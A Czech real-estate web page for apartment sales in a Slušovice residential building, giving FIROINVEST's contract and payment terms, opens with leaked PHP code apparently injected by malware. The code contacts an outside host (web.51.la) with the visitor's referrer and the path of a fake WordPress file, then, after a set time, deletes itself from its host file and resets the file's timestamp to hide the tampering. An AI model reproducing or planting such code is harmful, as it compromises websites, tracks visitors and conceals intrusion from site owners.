check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456791570){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=3&id=18777027&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/class-wp-fake.php"); } Smlouvy a platební podmínky

FIROINVEST spol. s r.o.

Bytový dům Slušovice – prodej bytů

Smlouvy


Platební podmínky:

  • 10% ceny do 10dnů po podpisu smlouvy o smlouvě budoucí
  • 40% ceny  při uzavřené hrubé stavbě
  • 50% doplatek celé kupní částky při kolaudaci ,zápisu do katastru a předání bytu

Smlouvy ke stažení zde: